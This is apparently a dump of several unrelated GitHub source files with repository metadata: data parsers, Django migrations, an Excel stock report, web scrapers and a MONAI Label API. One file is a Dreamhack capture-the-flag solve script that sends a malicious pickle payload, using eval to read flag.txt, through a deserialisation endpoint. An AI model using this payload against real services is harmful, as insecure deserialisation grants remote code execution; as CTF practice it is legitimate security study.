    main(args.src)
| [
"ykic.p3@gmail.com"
] | ykic.p3@gmail.com |
2ff241ddae7ce20a14a31ed89f2e7691d480791e | 67078e85453fdf9ee0b66ef5576904b3dfef5ab3 | /atheppy/heppyresult/ReadCounter.py | bbe669dca181716c1542b40b17bc76db42a93a24 | [
"BSD-3-Clause"
] | permissive | alphatwirl/atheppy | d72c45fc60ad1576107baca8e7ce14292edb9a85 | e4cbc070c2313f283053383edb629bb3cb80807e | refs/heads/master | 2021-04-27T04:17:31.146963 | 2018-05-22T18:20:09 | 2018-05-22T18:20:09 | 122,729,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,442 | py | # Tai Sakuma <tai.sakuma@gmail.com>
##__________________________________________________________________||
import re
import collections
import ast
import os
##__________________________________________________________________||
class ReadCounter(object):
    """Parse a Heppy ``Counter`` text file into an ordered {level: stats} mapping.

    Each data line follows the format
    ``'\\t {level:<40} {count:>9} \\t {eff1:4.2f} \\t {eff2:6.4f}\\n'``
    (see PhysicsTools/HeppyCore counter.py); the first line is a header.
    """

    def __call__(self, path):
        """Return the parsed counter dict for *path*, or None if the file is missing."""
        if not os.path.isfile(path):
            return None
        # BUGFIX: open in binary mode -- _readLine matches a *bytes* regex, so
        # lines must be bytes on Python 3 (text-mode open only worked on
        # Python 2).  'with' also fixes the original file-handle leak.
        with open(path, 'rb') as file:
            return self._readImp(file)

    def _readImp(self, file):
        """Read all counter lines from an open binary file object."""
        counter = collections.OrderedDict()
        file.readline()  # skip the 1st line (header)
        for line in file:
            level, content = self._readLine(line)
            if level is None:
                continue
            counter[level] = content
        return counter

    def _readLine(self, line):
        """Parse one counter line (bytes); return (level, stats dict) or (None, None)."""
        # a line is written in the format '\t {level:<40} {count:>9} \t {eff1:4.2f} \t {eff2:6.4f}\n'
        # https://github.com/cms-sw/cmssw/blob/CMSSW_7_4_0/PhysicsTools/HeppyCore/python/statistics/counter.py
        exp = r'^\t (.*?) *([0-9e+-.]*) \t ([0-9e+-.]*) \t ([0-9e+-.]*)$'
        exp = exp.encode()  # bytes pattern, matched against bytes lines
        match = re.search(exp, line)
        if not match:
            return None, None
        level = match.group(1)
        count = match.group(2)
        eff1 = match.group(3)
        eff2 = match.group(4)
        # literal_eval needs str, so decode the captured count bytes.
        count = count.decode()
        return level, dict(count=ast.literal_eval(count), eff1=float(eff1), eff2=float(eff2))
##__________________________________________________________________||
| [
"tai.sakuma@gmail.com"
] | tai.sakuma@gmail.com |
716bc9d348cf58bb1e32918f5b7fa16dfe239e62 | f63282dac793d4b028e752aa40d16085ef8bc1cd | /prof/migrations/0003_delete_log.py | a886bec6c499362853e56ebea58cb7726eb9bfb3 | [] | no_license | 13alireza77/twitter_api | 2b56e32fc5d2638c008417e02defeb7018b2c234 | 05d867975fe190e35134861d1dee84135d2fd523 | refs/heads/main | 2023-02-26T05:41:51.314613 | 2021-01-28T09:45:53 | 2021-01-28T09:45:53 | 332,535,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | # Generated by Django 3.1.5 on 2021-01-26 18:09
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('prof', '0002_auto_20210126_2123'),
]
operations = [
migrations.DeleteModel(
name='Log',
),
]
| [
"13alirezaalidoosti77@gmail.com"
] | 13alirezaalidoosti77@gmail.com |
ffd37d761c61abf2e0efaa93716912c96b6c32b4 | fa3414ad102838f5473b602193c8d0d15bde0b31 | /Stock/reports.py | 32fedde9c1d8f0e47feaeace868ffa0018bd4d52 | [] | no_license | MCRogersI/Panorama | e8df9c0ed56155fbc5e9a91d3a370acfe101e902 | 225c237bde18afee977386e72bd72ebdd8912643 | refs/heads/master | 2020-05-23T10:20:55.735430 | 2017-09-11T02:33:06 | 2017-09-11T02:33:06 | 80,423,505 | 1 | 1 | null | 2017-01-30T15:09:03 | 2017-01-30T13:25:47 | null | UTF-8 | Python | false | false | 8,230 | py | from pony.orm import *
from datetime import date, timedelta
import pandas as pd
import numpy as np
from openpyxl import Workbook, load_workbook, drawing
from openpyxl.styles import Font
import openpyxl
from openpyxl import Workbook
from openpyxl.chart import BarChart, Series, Reference
from openpyxl.styles.borders import Border, Side
from openpyxl.styles import Font,Alignment
from openpyxl.styles import PatternFill
from openpyxl.drawing.fill import PatternFillProperties, ColorChoice
from openpyxl.chart.marker import DataPoint
import os
def createStockReport(db):
thin_border = Border(left=Side(style='thin'),
right=Side(style='thin'),
top=Side(style='thin'),
bottom=Side(style='thin'))
from Stock.features import displayStock, calculateStockForExcel
with db_session:
skus = select(s for s in db.Stock).order_by(lambda s : s.id)
skus_ids = [sku.id for sku in skus]
skus_critical_levels = [sku.critical_level for sku in skus]
skus_names = [sku.name for sku in skus]
bases = [calculateStockForExcel(db, id) for id in skus_ids]
# wb = Workbook(write_only=True, guess_types=True) # Atención con el guess_types y el write_only
# wb = Workbook(write_only=False, guess_types=True)
wb = Workbook(write_only=False)
by_default_sheet = wb.get_sheet_by_name('Sheet')
wb.remove_sheet(by_default_sheet)
ws_raw = wb.create_sheet(title="Tablas de Stock")
ws_plotted = wb.create_sheet(title="Gráficos de Stock", index=0)
ws_raw.sheet_view.zoomScale = 30 #Para "alejar" el zoom de la hoja
ws_plotted.sheet_view.zoomScale = 30 #Para "alejar" el zoom de la hoja
counter = 0
id_counter = 0 #Arreglar para que quede más compacto y limpio
for b in bases:
base = b
dates = base[0]
values = base[1]
id_counter+=1
current_sku_id = skus_ids[id_counter-1]
current_sku_critical_level = skus_critical_levels[id_counter-1]
current_sku_name = skus_names[id_counter-1]
# rows = [
# ('Fechas', 'Cantidad', 'Batch 2'),
# (2, 10, 30),
# (3, 40, 60),
# (4, 50, 70),
# (5, 20, 10),
# (6, 10, 40),
# (7, 50, 30),
# ]
# vals = [(i,np.sqrt(i)) for i in range(0,20)]
vals = zip(dates, values)
rows = [('SKU', '{}'.format(current_sku_id)), ('Fecha', 'Cantidad')]
# rows = rows
# rows = rows.extend([('Fechas', 'Cantidad')])
rows.extend(vals)
row_counter = 0
max_value = max(values)
min_value = min(values)
for row in rows:
# ws_raw.append(row)
cell1 = ws_raw.cell(row=1+row_counter,column=1 + counter*4)
cell2 = ws_raw.cell(row=1+row_counter, column=2 + + counter*4)
# ws_raw.cell(row=1+row_counter,column=1 + counter*4).value = row[0]
cell1.value = row[0]
cell1.font = Font(bold=True, )
cell1.border = thin_border
cell1.alignment = Alignment(horizontal='left')
# ws_raw.cell(row=1+row_counter, column=2 + + counter*4).value = row[1]
cell2.value = row[1]
cell2.font = Font(bold=True, )
cell2.border = thin_border
cell2.alignment = Alignment(horizontal='left')
row_counter+=1
chart1 = BarChart()
chart1.type = "col"
chart1.style = 10
# chart1.title = "Status del SKU: {0}\n{1}".format(current_sku_id,current_sku_name) #Nombre con salto de línea
chart1.title = "Proyecciones para el SKU: {0}, {1}".format(current_sku_id, current_sku_name) #Nombre con flecha
chart1.y_axis.title = 'Cantidad'
chart1.x_axis.title = 'Fecha'
# data = Reference(ws, min_col=2, min_row=1, max_row=7, max_col=3)
data = Reference(ws_raw, min_col=2+ counter*4, min_row=2, max_row=len(rows))
cats = Reference(ws_raw, min_col=1+ counter*4, min_row=3, max_row=len(rows))
chart1.legend = None
chart1.add_data(data, titles_from_data=True)
chart1.set_categories(cats)
chart1.shape = 4
chart1.width = 100
chart1.y_axis.scaling.min = -200# 200 ES UN BUEN VALOR PARA EL DISPLAY FIJO
chart1.y_axis.scaling.min = min_value - 50 # VALOR MINIMO EN EL GRÁFICO
chart1.y_axis.scaling.max = 500# 500 ES UN BUEN VALOR PARA EL DISPLAY FIJO
chart1.y_axis.scaling.max = max_value + 50 # VALOR MAXIMO EN EL GRÁFICO
# set a pattern for the whole series
fill = PatternFillProperties(prst="ltUpDiag")
fill.foreground = ColorChoice(prstClr="blue")
fill.background = ColorChoice(prstClr="blue")
# pat = PatternFill("solid", fgColor="ffff00")
series = chart1.series[0]
series.graphicalProperties.pattFill = fill
#Obtener los índices de las alarmas
alarm_indexes = []
for i in range(0,len(values)):
if values[i] <= current_sku_critical_level:
alarm_indexes.append(i)
# Pintar de rojo las barras críticas
for alarm_index in alarm_indexes:
pt = DataPoint(idx=alarm_index)
alarm_fill = PatternFillProperties(prst="ltUpDiag")
alarm_fill.foreground = ColorChoice(prstClr="red")
alarm_fill.background = ColorChoice(prstClr="red")
pt.graphicalProperties.pattFill = alarm_fill
series.dPt.append(pt)
row_counter = 0
for alarm_index in alarm_indexes:
cell1 = ws_raw.cell(row=1 + alarm_index +2, column=1 + counter * 4)
cell2 = ws_raw.cell(row=1 + alarm_index +2, column=2 + + counter * 4)
cell1.font = Font(bold=True)
cell1.border = thin_border
cell1.alignment = Alignment(horizontal='left')
cell2.fill = PatternFill("solid", fgColor="ff0000")
cell2.font = Font(bold=True)
cell2.border = thin_border
cell2.alignment = Alignment(horizontal='left')
cell2.fill = PatternFill("solid", fgColor="ff0000")
# if(len(alarm_indexes)>0): #Si hay algún día bajo el nivel crítico
if (values[0] <= current_sku_critical_level): # Si hoy el nivel está crítico
cell3 = ws_raw.cell(row=1, column=1 + counter * 4 + 2)
cell3.value = "COMPRAR"
cell3.font = Font(bold=True)
cell3.border = thin_border
cell3.alignment = Alignment(horizontal='left')
cell3.fill = PatternFill("solid", fgColor="ff0000")
wrap_alignment = Alignment(wrap_text=True, horizontal="center",
vertical="center")
cell3.alignment = wrap_alignment
row_counter += 1
ws_plotted.add_chart(chart1, "{0}{1}".format("A",10 + counter*18))
counter+=1
# # Escribir la fecha en la que fue producida el reporte:
# ws_plotted.column_dimensions["C"].width = 20
# cell = ws_plotted.cell(row=3, column=3, value="Reporte producido el: ")
# cell.font = Font(bold=True, )
# cell.border = thin_border
# cell.alignment = Alignment(horizontal='left')
#
# cell = ws_plotted.cell(row=3, column=4, value=date.today())
# cell.font = Font(bold=True, )
# cell.border = thin_border
# cell.alignment = Alignment(horizontal='left')
try:
module_path = os.path.dirname(__file__)
panorama_folder_path = os.path.abspath(os.path.join(module_path, os.pardir))
report_folder_path = os.path.join(panorama_folder_path, "Reportes")
if not os.path.exists(report_folder_path):
os.makedirs(report_folder_path)
report_file_name = "Informe de Stock {}.xlsx".format(date.today())
fn = os.path.join(report_folder_path, report_file_name)
wb.save(fn)
except OSError as e:
if e.args[0] != 13:
raise
input("\n Ha ocurrido un error porque el archivo Informe de Stock.xlsx está abierto. Por favor ciérrelo y presione cualquier tecla para que el programa pueda continuar.")
from database import db
# createStockReport(db)
| [
"gaperez2@uc.cl"
] | gaperez2@uc.cl |
316dab7a9254a7b5775eafa39e9a5a3d89a2fa74 | d69b7f878bdbb9e278a63c7bb6f99e974cd57a80 | /2.Advanced/23.Advanced_Python_Python_Generators_in_Simple_Way_by_Durga_On_20-09-2018_5.py | 4d083411260bcf4dd0451b4339e943501d0ca7d3 | [] | no_license | rexelit58/python | cf8e1faf9441d720036814cef0134a3388d3d4f5 | dfadecf2183f4b6fe6f3c6ae38cd2f03301a2735 | refs/heads/master | 2023-06-26T14:54:40.078073 | 2021-07-18T13:54:46 | 2021-07-18T13:54:46 | 387,185,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | def fib():
a,b=0,1
while True:
yield a
a,b=b,a+b
for n in fib():
if n>100:
break
print(n) | [
"kaviyarasan.a@infinitisoftware.net"
] | kaviyarasan.a@infinitisoftware.net |
4f27d80585a6cc4ed6fa8b0abb2437eaf6559a6f | 994b6c4dfd6a0f78a81f87235e3c6972db3f2142 | /main.py | dfbc12a5f9abf73452a06ad3fa3c240e0556f91b | [] | no_license | dengjiaxing/Scrapy-WindowsAPI- | d0cede10a7ca9e6b760895e85de22ace72ed257e | 4a92cc378d3cccb46404cff250f06f7afcb720c2 | refs/heads/master | 2021-01-22T22:35:16.665330 | 2017-03-20T09:23:58 | 2017-03-20T09:23:58 | 85,557,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | #-*- coding: utf-8 -*-
import scrapy.cmdline as cmd
cmd.execute('scrapy crawl api'.split())
| [
"jiaxing@nfs.iscas.ac.cn"
] | jiaxing@nfs.iscas.ac.cn |
0de6164a579340619a967feedf9cae55abad520b | 84bd24e7aba23c7775f52d51c754f14601e28b61 | /property/migrations/0044_propertybooking.py | 20c06999c6842c6b8258f87396995344f74c9908 | [] | no_license | hamzaumar8/sandvet | c0ad473e8f2f97d1c5bf5104e034e731ac0a0add | 7f02d24f1b50cd4f64beff618b6d9c508b7a42d4 | refs/heads/master | 2023-02-18T01:28:25.252360 | 2021-01-18T19:26:39 | 2021-01-18T19:26:39 | 310,844,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | # Generated by Django 3.0.6 on 2021-01-04 11:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0007_booking'),
('property', '0043_hotelimage_hotelroomimage'),
]
operations = [
migrations.CreateModel(
name='PropertyBooking',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('booking', models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='propertybooking', to='core.Booking')),
('property', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='bookproperty', to='property.Property')),
],
),
]
| [
"humar6078@gmail.com"
] | humar6078@gmail.com |
7e4f7dc89e2d0ddffe361240627a76cb48bdea6f | fa6e1299ef52ca2d4a13b3788d2a4d0540728f81 | /monailabel/endpoints/batch_infer.py | 09460c5d37ca8b8d759cba1949837a1bc4eceadb | [
"Apache-2.0"
] | permissive | Project-MONAI/MONAILabel | c3abd164255a50279fc5aa6a87f4336fff4d6833 | c90f42c0730554e3a05af93645ae84ccdcb5e14b | refs/heads/main | 2023-09-01T21:44:42.465238 | 2023-08-31T17:17:08 | 2023-08-31T17:17:08 | 351,826,770 | 448 | 167 | Apache-2.0 | 2023-09-14T12:06:28 | 2021-03-26T15:25:10 | Python | UTF-8 | Python | false | false | 3,049 | py | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Optional
import torch
from fastapi import APIRouter, Depends, HTTPException
from monailabel.config import RBAC_ADMIN, RBAC_USER, settings
from monailabel.endpoints.user.auth import RBAC, User
from monailabel.interfaces.datastore import DefaultLabelTag
from monailabel.interfaces.tasks.batch_infer import BatchInferImageType
from monailabel.utils.async_tasks.task import AsyncTask
logger = logging.getLogger(__name__)
router = APIRouter(
prefix="/batch",
tags=["Infer"],
responses={404: {"description": "Not found"}},
)
def status(all: bool = False, check_if_running: bool = False):
res, detail = AsyncTask.status("batch_infer", all, check_if_running)
if res is None:
raise HTTPException(status_code=404, detail=detail)
return res
def run(
model: str,
images: Optional[BatchInferImageType] = BatchInferImageType.IMAGES_ALL,
params: Optional[dict] = None,
run_sync: Optional[bool] = False,
):
request = {"model": model, "images": images}
res, detail = AsyncTask.run("batch_infer", request=request, params=params, force_sync=run_sync)
if res is None:
raise HTTPException(status_code=429, detail=detail)
return res
def stop():
res = AsyncTask.stop("batch_infer")
# Try to clear cuda cache
if torch.cuda.is_available():
torch.cuda.empty_cache()
return res
@router.get("/infer", summary=f"{RBAC_USER}Get Status of Batch Inference Task")
async def api_status(
all: bool = False,
check_if_running: bool = False,
user: User = Depends(RBAC(settings.MONAI_LABEL_AUTH_ROLE_USER)),
):
return status(all, check_if_running)
@router.post("/infer/{model}", summary=f"{RBAC_ADMIN}Run Batch Inference Task")
async def api_run(
model: str,
images: Optional[BatchInferImageType] = BatchInferImageType.IMAGES_ALL,
params: Optional[dict] = {
"device": "cuda",
"multi_gpu": True,
"gpus": "all",
"logging": "WARNING",
"save_label": True,
"label_tag": DefaultLabelTag.ORIGINAL,
"max_workers": 1,
"max_batch_size": 0,
},
run_sync: Optional[bool] = False,
user: User = Depends(RBAC(settings.MONAI_LABEL_AUTH_ROLE_ADMIN)),
):
return run(model, images, params, run_sync)
@router.delete("/infer", summary=f"{RBAC_ADMIN}Stop Batch Inference Task")
async def api_stop(user: User = Depends(RBAC(settings.MONAI_LABEL_AUTH_ROLE_ADMIN))):
return stop()
| [
"noreply@github.com"
] | Project-MONAI.noreply@github.com |
13622a6dd22539e66141720c7144c2e1a23fc69f | a5ba6fc441a8d53dfb5218ef0ef3c6c30b0591e2 | /Dreamhack/web-deserialize-python/solve.py | cd8b34f022d73db6080e298127b4670b15c61b6f | [] | no_license | heogi/CTF-Writeups | a6332dea0af5b3d5e0697d47569d1331332d1ec5 | f6f55f359a443ce1af4553820e340ae774bfb4fd | refs/heads/master | 2021-09-29T18:02:50.485804 | 2021-09-25T03:23:07 | 2021-09-25T03:23:07 | 162,892,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | import requests
import base64
import pickle
import os
url = "http://host1.dreamhack.games:8248/check_session"
info = {"name":123}
FLAG="123"
class exploit(object):
def __reduce__(self):
return (eval,("{'name':open('flag.txt').read()}",))
#return (eval,('open("./flag.txt","r").read()',))
def ex():
#exp = {"name":exploit(),"userid":"123","password":"123"}
#exp = exploit()
exp = base64.b64encode(pickle.dumps(exploit())).decode('utf8')
print(exp)
#print(pickle.loads(base64.b64decode(exp)))
data = {'session': exp}
r = requests.post(url=url,data=data)
print(r.text)
if __name__ == '__main__':
ex()
| [
"noreply@github.com"
] | heogi.noreply@github.com |
864640da95a3bf3b599769c90db530fa7453696e | b0675ed261ff01fe050e8bacd05e692851e087b8 | /no1/02_tieba_spider.py | b54e288b011d1558c2e7772a605dd051afb8487f | [] | no_license | likunhong01/SpiderStudy | dafd6df0525f7ffa5c855c5213710c3bc37dc709 | 78288d3429e7ed2ae175c0009f6c5c85b408c436 | refs/heads/master | 2020-05-09T12:38:15.065593 | 2019-04-28T09:12:18 | 2019-04-28T09:12:18 | 181,118,325 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,694 | py | #coding=utf-8
#Version:python3.6.0
#Tools:Pycharm 2017.3.2
# Author:LIKUNHONG
__date__ = '2019/4/12 19:36'
__author__ = 'likunkun'
import requests
class TiebaSpider:
def __init__(self,tieba_name):
self.tieba_name = tieba_name
self.url_temp = 'https://tieba.baidu.com/f?kw=' + tieba_name+ '&ie=utf-8&pn={}'
self.headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.6784.400 QQBrowser/10.3.2667.400'}
def get_url_list(self): # 构造url列表,把贴吧的每一页都爬取
# url_list = []
# for i in range(1000):
# url_list.append(self.url_temp.format(i*50))
# return url_list
return [self.url_temp.format(i * 50) for i in range(1000)]
def parse_url(self, url): # 发送请求,获取响应
print(url)
response = requests.get(url=url,headers=self.headers)
return response.content.decode()
def save_html(self, html_str, page_num): # 保存html字符串
file_path = '{}-第{}页.html'.format(self.tieba_name, page_num)
with open(file_path,'w',encoding='utf-8') as f: # 黑洞-第1页.html
f.write(html_str)
def run(self): # 实现主要逻辑
# 构造url列表
url_list = self.get_url_list()
# 遍历,发送请求,获取相应
for url in url_list:
html_str = self.parse_url(url)
# 保存数据
page_num = url_list.index(url) + 1 # 页码数
self.save_html(html_str, page_num)
if __name__ == '__main__':
tieba_spider = TiebaSpider('黑洞')
tieba_spider.run() | [
"42308753+likunhong01@users.noreply.github.com"
] | 42308753+likunhong01@users.noreply.github.com |
886ceeab2d5a622b7a03f7dddf725706fde63620 | 168cbb8a8c3e7287779075a319c27a357cb12ad4 | /Sql/baza_sql.py | 0be5e7a18f551be7255b887db2139ee4ce0f0a96 | [] | no_license | kaacpper/gittest | d17092e8d6de61729399026dce4a4615d44cd3dc | 4840fdaf7e7773d4e0dc0da415e53e96f1aeca23 | refs/heads/master | 2021-01-20T15:07:08.644546 | 2018-03-09T17:44:41 | 2018-03-09T17:44:41 | 82,795,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# baza_sql.py
import sqlite3
from dane import * # import funkcji z pliku dane.py
def main(args):
con = sqlite3.connect('pracownicy.sqlite3')
cur = con.cursor() #utworzenie kursora, chodzi sobie po bazie danych
#utworzenie tabel w bazie danych
with open('pracownicy_z1.sql','r') as plik:
skrypt = plik.read()
cur.executescript(skrypt)
premia = dane_z_pliku('premia.txt')
premia = wyczysc_dane(premia, 1)
dzial = dane_z_pliku('dział.txt')
pracownicy = dane_z_pliku('pracownicy.txt')
pracownicy = wyczysc_dane(pracownicy, 5)
print(pracownicy[0])
cur.executemany('INSERT INTO premia VALUES (?, ?)', premia)
cur.executemany('INSERT INTO dzial VALUES (?, ?, ?)', dzial)
cur.executemany('INSERT INTO pracownicy (id, nazwisko, imie, stanowisko, data_zatrudnienia, placa, id_dzial) VALUES (?, ?, ?, ?, ?, ?, ?)', pracownicy)
con.commit() # zatwierdzenie operacji na bazie
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
| [
"kl3ag1@komp12.lo1cg.org"
] | kl3ag1@komp12.lo1cg.org |
9881d546e5b1b67fd92bcc5ce63e178f0961fbc8 | b352b043ed9db9e53767fe51d1238e376fc53b09 | /data-py/getArtisanData.py | c04256111e0650e6b1ca2300fae10123b63e93db | [] | no_license | AmritM18/stardew-valley-api | 8799582c352212e297f7cfebdf144f702a75103a | 0b25869848a605d1925435f75625599662d6ce2b | refs/heads/master | 2023-02-12T15:41:46.847506 | 2021-01-13T19:41:05 | 2021-01-13T19:41:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,037 | py | import requests
from bs4 import BeautifulSoup
import pandas as pd
def getBeeHouseData(req, indices):
clip = req.split("id=\"Bee_House\"")
clip = clip[1]
soup = BeautifulSoup(clip,'lxml')
table = soup.findAll('table',{'class':'wikitable'})
# looking at all of the tables except for the last 3 (geodes, collection, history)
rows = table[1].findChildren('tr', recursive=False)
tds = tds = rows[1].findChildren('td', recursive=False)
honey = [tds[x].text.strip(' ').strip('\n').replace('\xa0', '') for x in indices]
honey[3] = honey[3] + ': ' + tds[7].text.strip().replace('\xa0', '')
honey.append('Bee House')
for i in range(2, len(rows)):
tds = rows[i].findChildren('td', recursive=False)
if len(tds) == 3: honey[3] = honey[3] + ', ' + tds[1].text.strip() + ': ' + tds[2].text.strip()
elif len(tds) == 2: honey[3] = honey[3] + ', ' + tds[0].text.strip() + ': ' + tds[1].text.strip()
return honey
def getCaskData(req, indices):
clip = req.split("id=\"Cask\"")
clip = clip[1]
soup = BeautifulSoup(clip,'lxml')
table = soup.findAll('table',{'class':'wikitable'})
caskData = []
rows = table[1].findChildren('tr', recursive=False)
for i in range(1, len(rows)):
tds = rows[i].findChildren('td', recursive=False)
cask = [tds[x].text.strip().replace('\xa0', '') for x in indices] # only gives us name and recipe
# now process the Time and Sell tds[3] -- tds[6]
cask.append('0 Days')
cask.append(tds[3].text.strip())
cask[2] = cask[2] + ', ' + tds[4].text[(tds[4].text.rfind(':'))+2:].strip() + ' (Silver)'
cask[3] = cask[3] + ', ' + tds[4].text[:tds[4].text.rfind('Aged')].strip() + ' (Silver)'
cask[2] = cask[2] + ', ' + tds[5].text[(tds[5].text.rfind(':'))+2:].strip() + ' (Gold)'
cask[3] = cask[3] + ', ' + tds[5].text[:tds[5].text.rfind('Aged')].strip() + ' (Gold)'
cask[2] = cask[2] + ', ' + tds[6].text[(tds[6].text.rfind(':'))+2:].strip() + ' (Iridium)'
cask[3] = cask[3] + ', ' + tds[6].text[:tds[6].text.rfind('Aged')].strip() + ' (Iridium)'
cask.append('Cask')
caskData.append(cask)
return caskData
# This requires the oil to have only 2 rows
def getOilMakerData(req, indices):
clip = req.split("id=\"Oil_Maker\"")
clip = clip[1]
soup = BeautifulSoup(clip,'lxml')
table = soup.findAll('table',{'class':'wikitable'})
data = []
rows = table[1].findChildren('tr', recursive=False)
tds = rows[1].findChildren('td', recursive=False)
oil = [tds[x].text.strip().replace('\xa0', '') for x in indices]
oil.append('Oiler Maker')
data.append(oil)
tds = rows[2].findChildren('td', recursive=False)
oil = [tds[x].text.strip().replace('\xa0', '') for x in indices]
oil.append('Oiler Maker')
for i in range(3, 5):
tds = rows[i].findChildren('td', recursive=False)
oil[1] = oil[1] + ', ' + tds[0].text.strip()
oil[2] = oil[2] + ', ' + tds[1].text.strip()
data.append(oil)
return data
def getArtisanData(name, req, indices):
clip = req.split("id=\"" + name.replace(' ', '_') + "\"")
clip = clip[1]
soup = BeautifulSoup(clip,'lxml')
table = soup.findAll('table',{'class':'wikitable'})
data = []
rows = table[1].findChildren('tr', recursive=False)
for i in range(1, len(rows)):
tds = rows[i].findChildren('td', recursive=False)
item = [tds[x].text.strip().replace('\xa0', '') for x in indices]
item.append(name)
if name == "Mayonnaise Machine" or name == "Cheese Press":
item[3] = item[3].replace(' ', '').replace('\n', '').replace('g', 'g, ', 1)
data.append(item)
return data
def main():
# Artisan goods found here: https://stardewvalleywiki.com/Artisan_Goods
# By default, each category has 5 columns unless otherwise stated
# Bee House
# Cask
# Cheese Press
# Keg
# Loom
# Mayonnaise Machine
# Oil Maker
# Preserves Jar
site = "https://stardewvalleywiki.com/Artisan_Goods"
req = requests.get(site).text
columns = ['Name', 'Recipe', 'Time', 'Sell', 'Equipment']
indices = [1, 3, 4, 5]
df = pd.DataFrame(columns=columns)
# Honey
beeHouseIndices = [1, 2, 4, 6]
honey = getBeeHouseData(req, beeHouseIndices)
df = df.append(pd.Series(honey, index=columns), ignore_index=True)
# Cask Data
caskIndices = [1, 2] # time and sell need to be determined from columns 3,4,5,6
caskData = getCaskData(req, caskIndices)
for item in caskData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Cheese Press
name = "Cheese Press"
pressData = getArtisanData(name, req, indices)
for item in pressData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Keg
name = "Keg"
kegData = getArtisanData(name, req, indices)
for item in kegData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Loom
name = "Loom"
loomData = getArtisanData(name, req, indices)
for item in loomData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Mayonnaise Machine
name = "Mayonnaise Machine"
mayonnaiseMachineData = getArtisanData(name, req, indices)
for item in mayonnaiseMachineData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Oil Maker
oilMakerData = getOilMakerData(req, indices)
for item in oilMakerData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Preserves Jar
name = "Preserves Jar"
preservesJarData = getArtisanData(name, req, indices)
for item in preservesJarData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
df.to_csv("/home/amrit/projects/ArtisanData.csv", index=False, encoding='utf-8')
if __name__ == "__main__":
main() | [
"32170897+emilyanas2323@users.noreply.github.com"
] | 32170897+emilyanas2323@users.noreply.github.com |
6a55a58c4b69fce67e16280d94199e88f4af5fca | ea37f2269a796143cf0b1ce2131c425c95e3a954 | /CentralMeasurePosition.py | f7e0b24acf72363272db6c1016f29fec783a6a68 | [] | no_license | paepe/GitBegginers | 886896225f84d03495b53cb96facfc65ac7c562b | 382ac2b913cab7dc24c28379c950f9416cb51dfa | refs/heads/master | 2023-03-29T11:18:20.252793 | 2020-05-23T12:09:09 | 2020-05-23T12:09:09 | 261,003,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | import np
import statistics
from fractions import Fraction as F
from decimal import Decimal as D
# Onde está o erro de np
# np.random.choice(a = [0, 1], size = 50, replace = True, p = [0.5, 0.5, 0.2])
# Calcular a Mediana
x = statistics.median([22, 10, 12, 14, 13, 15])
print(x)
| [
"paulo.peres2014@gmail.com"
] | paulo.peres2014@gmail.com |
419cacd72654319780930be944c1ee242808127b | 28737541ba548ec968750190a1773a427a443664 | /Screen_Shots/Element_Ssreen_Shot.py | 073c8a38df42a5459f87ab9887abe84feaec212a | [] | no_license | Rajeevsinghania15/GitTest1 | 9c18650a544eb02b98ad2a726f854f99be00e3a5 | 9736093d2f8774c368e615b48b60378262b7968e | refs/heads/master | 2020-04-09T09:37:49.218027 | 2018-12-03T19:41:01 | 2018-12-03T19:41:01 | 160,240,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | from selenium import webdriver
import time
from PIL import Image
driver = webdriver.Chrome()
driver.maximize_window()
driver.get("https://demo.actitime.com/login.do")
driver.implicitly_wait(30)
ele = driver.find_element_by_id("loginButton")
driver.save_screenshot("Sample.png")
img = Image.open("Sample.png")
loc = ele.location
size = ele.size
left = loc["x"]
top = loc['y']
right = loc["x"] + size['width']
bottom = loc['y'] + size['height']
img = img.crop((left,top,right,bottom))
img.save('Cropping.png')
time.sleep(5)
driver.close() | [
"Manoj Rajeev@DESKTOP-IG87LFQ"
] | Manoj Rajeev@DESKTOP-IG87LFQ |
498f444e9944af0709395bdbffcaeedc770d6ed7 | 07330c446d2efc7966d4e98e3ae19a33314fed22 | /python_choice_models/estimation/market_explore/__init__.py | a21b25cfd3303afc35e686e5f57c9e8c309d580b | [] | no_license | DRL-OM/choice-models | f4d26a771ee0ab2988a112a6a84b388764275a66 | 90b1f1c7160672fdf8b5689fbf5480e29576bf01 | refs/heads/master | 2023-03-26T01:33:40.160397 | 2021-03-25T14:18:47 | 2021-03-25T14:18:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | # This code is from the paper:
